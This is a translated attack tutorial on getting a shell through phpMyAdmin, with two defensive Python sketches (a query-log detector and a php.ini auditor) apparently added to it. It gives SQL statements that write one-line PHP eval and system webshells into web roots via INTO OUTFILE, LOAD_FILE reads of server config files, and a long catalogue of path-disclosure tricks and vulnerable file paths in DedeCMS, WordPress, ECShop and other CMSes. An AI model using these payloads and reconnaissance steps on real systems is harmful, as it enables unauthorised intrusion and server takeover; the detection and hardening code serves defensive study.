phpMyAdmin, get the shell.

Source: Internet
Author: User

Method One:

CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL);

INSERT INTO `mysql`.`xiaoma` (`xiaoma1`) VALUES ('<?php @eval($_POST[xiaoma])?>');

SELECT xiaoma1 FROM `mysql`.`xiaoma` INTO OUTFILE 'e:/wamp/www/7.php';

Run the statements above together: they create a table named xiaoma with the field xiaoma1 in the mysql database, then export it to e:/wamp/www/7.php.

Connection password for the one-line webshell: xiaoma

Method Two:

CREATE TABLE xiaoma (xiaoma1 TEXT NOT NULL);

INSERT INTO xiaoma (xiaoma1) VALUES ('<?php eval($_POST[xiaoma])?>');

SELECT xiaoma1 FROM xiaoma INTO OUTFILE 'e:/wamp/www/7.php';

DROP TABLE IF EXISTS xiaoma;

Method Three:

Read file contents: SELECT LOAD_FILE('e:/xamp/www/s.php');

Write a one-line webshell: SELECT '<?php @eval($_POST[cmd])?>' INTO OUTFILE 'e:/xamp/www/xiaoma.php'

Command execution: SELECT '<?php echo \'<pre>\'; system($_GET[\'cmd\']); echo \'</pre>\';?>' INTO OUTFILE 'e:/xamp/www/xiaoma.php'

Method Four:

SELECT LOAD_FILE('e:/xamp/www/xiaoma.php');

SELECT '<?php echo \'<pre>\'; system($_GET[\'cmd\']); echo \'</pre>\';?>' INTO OUTFILE 'e:/xamp/www/xiaoma.php'

Then visit the file under the site directory: http://www.xxxx.com/xiaoma.php?cmd=dir
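All four methods leave the same trace on the database side: a PHP tag inside a SQL string literal, and an INTO OUTFILE or LOAD_FILE() call that touches the web root. The following detection sketch is an added example, not part of the original post. It scans query-log lines for those traces, and the log lines and their simplified format are constructed for illustration.

```python
import re

# Constructed sample of MySQL general query log lines (simplified format,
# not from a real server). Paths mirror the ones used on this page.
SAMPLE_LOG = """\
2024-01-10T08:00:01Z 12 Query SELECT id, title FROM news WHERE id = 149
2024-01-10T08:00:05Z 12 Query INSERT INTO xiaoma (xiaoma1) VALUES ('<?php @eval($_POST[xiaoma])?>')
2024-01-10T08:00:06Z 12 Query SELECT xiaoma1 FROM xiaoma INTO OUTFILE 'e:/wamp/www/7.php'
2024-01-10T08:00:09Z 12 Query SELECT LOAD_FILE('e:/xamp/www/s.php')
2024-01-10T08:01:00Z 15 Query SELECT * FROM orders INTO OUTFILE '/var/lib/mysql-files/orders.csv'
"""

EXPORT = re.compile(r"\bINTO\s+(OUTFILE|DUMPFILE)\s+'([^']+)'", re.I)
LOAD = re.compile(r"\bLOAD_FILE\s*\(\s*'([^']+)'", re.I)
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|jsp|aspx?)$", re.I)
PHP_TAG = re.compile(r"<\?(php|=)", re.I)

def classify(statement):
    """Return a list of (severity, reason) findings for one SQL statement."""
    findings = []
    m = EXPORT.search(statement)
    if m:
        target = m.group(2).strip()
        if SCRIPT_EXT.search(target):
            findings.append(("high", f"{m.group(1).upper()} writes script file {target}"))
        else:
            findings.append(("low", f"file export to {target}"))
    if PHP_TAG.search(statement):
        findings.append(("medium", "PHP open tag inside SQL string literal"))
    m = LOAD.search(statement)
    if m:
        findings.append(("medium", f"LOAD_FILE reads {m.group(1).strip()}"))
    return findings

def scan(log_text):
    """Return (line_number, severity, reason) for every suspicious log line."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        for severity, reason in classify(line):
            hits.append((n, severity, reason))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

On the server itself, these statements fail when secure_file_priv is set to NULL or to a directory outside the web root, and when the account used through phpMyAdmin does not hold the FILE privilege.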

PHP path disclosure methods:

1. Single-quote path disclosure

Description

Add a single quotation mark directly after the URL. This requires that single quotes are not filtered (magic_quotes_gpc=Off) and that the server returns error messages, which it does by default.

www.xxx.com/news.php?id=149'

2. Invalid parameter value path disclosure

Description

Change the value of the submitted parameter to an invalid value, such as -1 or -99999. You may try this when single quotes are filtered.

www.xxx.com/researcharchive.php?id=-1

3. Google path disclosure

Description

Combine keywords with the site: operator to search cached snapshots of error pages; common keywords are "warning" and "fatal error". Note that if the target site is a second-level domain name, point site: at its top-level domain name, which returns much more information.

site:xxx.edu.tw warning

site:xxx.com.tw "fatal error"

4. Test file path disclosure

Description

Many websites have test files in their root directory, and the script code is usually phpinfo().

www.xxx.com/test.php

www.xxx.com/ceshi.php

www.xxx.com/info.php

www.xxx.com/phpinfo.php

www.xxx.com/php_info.php

www.xxx.com/1.php

5. phpMyAdmin path disclosure

Description

Once you find the phpMyAdmin admin page, accessing certain files in that directory is likely to disclose the physical path. To locate the phpMyAdmin address, you can sweep with a tool such as wwwscan, or use Google. Note: some sites write the directory name in mixed case, as phpMyAdmin.

1. /phpmyadmin/libraries/lect_lang.lib.php

2. /phpmyadmin/index.php?lang[]=1

3. /phpmyadmin/phpinfo.php

4. load_file()

5. /phpmyadmin/themes/darkblue_orange/layout.inc.php

6. /phpmyadmin/libraries/select_lang.lib.php

7. /phpmyadmin/libraries/lect_lang.lib.php

8. /phpmyadmin/libraries/mcrypt.lib.php

6. Finding the path in configuration files

Description

If the injection point has file read permission, you can read the configuration file manually with load_file() or with a tool, and then look for path information (typically at the end of the file). The default paths of the web server and PHP configuration files on each platform can be looked up online; here are a few common ones.

Windows:

C:\windows\php.ini PHP configuration file

C:\windows\system32\inetsrv\MetaBase.xml IIS Virtual Host configuration file

Linux:

/etc/php.ini PHP configuration file

/etc/httpd/conf.d/php.conf

/etc/httpd/conf/httpd.conf Apache configuration file

/usr/local/apache/conf/httpd.conf

/usr/local/apache2/conf/httpd.conf

/usr/local/apache/conf/extra/httpd-vhosts.conf Virtual Directory configuration file

7. Nginx file type parsing error path disclosure

Description

This is a method that was discovered by accident yesterday. It requires that the web server is Nginx and that it has the file type parsing vulnerability. Sometimes, when /x.php is appended to an image address, the image is not only executed as a PHP file but may also disclose the physical path.

www.xxx.com/top.jpg/x.php
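Methods 1, 2 and 4 depend on PHP sending error output to the client, and method 7 depends on PHP resolving /top.jpg/x.php to the image file. The following php.ini audit is an added example, not part of the original post. It checks the directives behind both behaviours; the sample ini text and the risk descriptions are constructed for illustration.

```python
# Constructed php.ini fragment (not taken from a real server).
SAMPLE_INI = """\
[PHP]
; development settings left in place
display_errors = On
log_errors = Off
;cgi.fix_pathinfo=0
"""

# directive -> (safe state, built-in default, what the unsafe state allows)
# A default of None means the directive is judged only when set explicitly.
CHECKS = {
    "display_errors": (False, True,
        "warnings and fatal errors print absolute paths to the client"),
    "display_startup_errors": (False, None,
        "startup errors print absolute paths to the client"),
    "cgi.fix_pathinfo": (False, True,
        "a request such as /top.jpg/x.php may be handed to PHP behind Nginx"),
}

TRUE = {"1", "on", "true", "yes", "stdout", "stderr"}

def parse_ini(text):
    """Parse php.ini text into {directive: value}; the last occurrence wins."""
    values = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()  # drop ';' comments
        if "=" not in line or line.startswith("["):
            continue
        key, val = line.split("=", 1)
        values[key.strip().lower()] = val.strip().strip('"').lower()
    return values

def audit(text):
    """Return (directive, 'set' or 'default', risk) for each unsafe directive."""
    values = parse_ini(text)
    findings = []
    for name, (safe, default, risk) in CHECKS.items():
        if name in values:
            enabled, origin = values[name] in TRUE, "set"
        elif default is not None:
            enabled, origin = default, "default"  # commented out or missing
        else:
            continue
        if enabled != safe:
            findings.append((name, origin, risk))
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_INI):
        print(finding)
```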

8. Other

Dedecms

/member/templets/menulit.php

plus/paycenter/alipay/return_url.php

plus/paycenter/cbpayment/autoreceive.php

paycenter/nps/config_pay_nps.php

plus/task/dede-maketimehtml.php

plus/task/dede-optimize-table.php

plus/task/dede-upcache.php

Wp

wp-admin/includes/file.php

wp-content/themes/baiaogu-seo/footer.php

ECShop mall system path disclosure files

/api/cron.php

/wap/goods.php

/temp/compiled/ur_here.lbi.php

/temp/compiled/pages.lbi.php

/temp/compiled/user_transaction.dwt.php

/temp/compiled/history.lbi.php

/temp/compiled/page_footer.lbi.php

/temp/compiled/goods.dwt.php

/temp/compiled/user_clips.dwt.php

/temp/compiled/goods_article.lbi.php

/temp/compiled/comments_list.lbi.php

/temp/compiled/recommend_promotion.lbi.php

/temp/compiled/search.dwt.php

/temp/compiled/category_tree.lbi.php

/temp/compiled/user_passport.dwt.php

/temp/compiled/promotion_info.lbi.php

/temp/compiled/user_menu.lbi.php

/temp/compiled/message.dwt.php

/temp/compiled/admin/pagefooter.htm.php

/temp/compiled/admin/page.htm.php

/temp/compiled/admin/start.htm.php

/temp/compiled/admin/goods_search.htm.php

/temp/compiled/admin/index.htm.php

/temp/compiled/admin/order_list.htm.php

/temp/compiled/admin/menu.htm.php

/temp/compiled/admin/login.htm.php

/temp/compiled/admin/message.htm.php

/temp/compiled/admin/goods_list.htm.php

/temp/compiled/admin/pageheader.htm.php

/temp/compiled/admin/top.htm.php

/temp/compiled/top10.lbi.php

/temp/compiled/member_info.lbi.php

/temp/compiled/bought_goods.lbi.php

/temp/compiled/goods_related.lbi.php

/temp/compiled/page_header.lbi.php

/temp/compiled/goods_script.html.php

/temp/compiled/index.dwt.php

/temp/compiled/goods_fittings.lbi.php

/temp/compiled/myship.dwt.php

/temp/compiled/brands.lbi.php

/temp/compiled/help.lbi.php

/temp/compiled/goods_gallery.lbi.php

/temp/compiled/comments.lbi.php

/temp/compiled/myship.lbi.php

/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php

/includes/modules/cron/auto_manage.php

/includes/modules/cron/ipdel.php

UCenter path disclosure

ucenter\control\admin\db.php

Dzbbs

Manyou/admincp.php?my_suffix=%0a%0dtoby57

Z-blog

admin/fckeditor/editor/dialog/fck%5fspellerpages/spellerpages/server%2dscripts/spellchecker.php

php168 path disclosure

Admin/inc/hack/count.php?job=list

Admin/inc/hack/search.php?job=getcode

Admin/inc/ajax/bencandy.php?job=do

Cache/mysqltime.txt

Phpcms2008-sp4

Accessible after logging in as a registered user

Phpcms/corpandresize/process.php?pic=. /images/logo.gif

Bo-blog

PoC:

/go.php/<[evil Code]

CmsEasy path disclosure vulnerability

The vulnerability is in the menu_top.php file

lib/mods/celive/menu_top.php

/lib/default/ballot_act.php

lib/default/special_act.php
